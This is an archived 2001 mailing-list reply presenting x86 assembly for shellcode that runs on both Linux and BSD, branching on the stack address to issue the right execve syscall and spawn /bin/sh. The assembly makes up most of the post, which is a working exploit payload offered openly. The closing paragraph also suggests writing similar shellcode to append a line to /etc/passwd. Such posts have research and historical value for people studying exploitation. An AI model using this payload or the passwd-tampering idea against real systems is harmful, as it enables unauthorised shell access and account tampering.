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Re: multi-OS infections (Multi OS shellcode)

From: Sweasel18 () aol com
Date: Thu, 26 Jul 2001 17:38:37 EDT

The following asm was used to create the shellcode that follows it.  The 
shellcode works on both Linux and *BSD on x86 arch(tested on slackware and 
freeBSD).  The shellcode executes /bin/sh and does not do setresuid() which 
would be necesarry for an exploit(can be done the same way I do execve(), yes 
the code is ugly and not optimized but it does work).  Thanks to zen-parse 
and corecode for the help.

.global main
main:   jmp    bottom
top:     popl   %ebx
           xorl   %edx, %edx
           movl  %ebx,0x8(%edi)
           movl  %edx,0xc(%edi)
           leal    0x8(%edi),%ecx
           leal    0xc(%esi),%edx
           pushl %edx                      #envp
           pushl %ecx                      #argv
           pushl %ebx                      #string
           movl  $0xbfff0101, %esi
           cmp  %esi, %esp
           jg      linux
           jmp   bsd
exit:    add    $12, %esp
           movl  $0x11111112,%eax
           xorl   $0x11111113,%eax  #syscall 1, exit
           pushl %eax
           int     $0x80
linux:   movl   $0x1111113b, %eax
           xorl    $0x11111130, %eax #sycall 11 on linux, execve
           int     $0x80 
           jmp    exit
bsd:    movl   $0x11111130, %eax
          xorl     $0x1111110b, %eax #sycall 59 on BSD, execve
           pushl %eax
           int     $0x80
           jmp   exit
bottom: call   top
           .string "/bin/sh\0"


Doing something where the system calls are the same is a little bit easier 
because you don't have to test wether it is BSD or Linux.  I have example 
shellcode of this that writes hello world on my site,  write, open, close are sys calls 4, 5, 6 
respectively on both linux and BSD, so writing shellcode to add a line to 
/etc/passwd would be pretty easy and fairly small.


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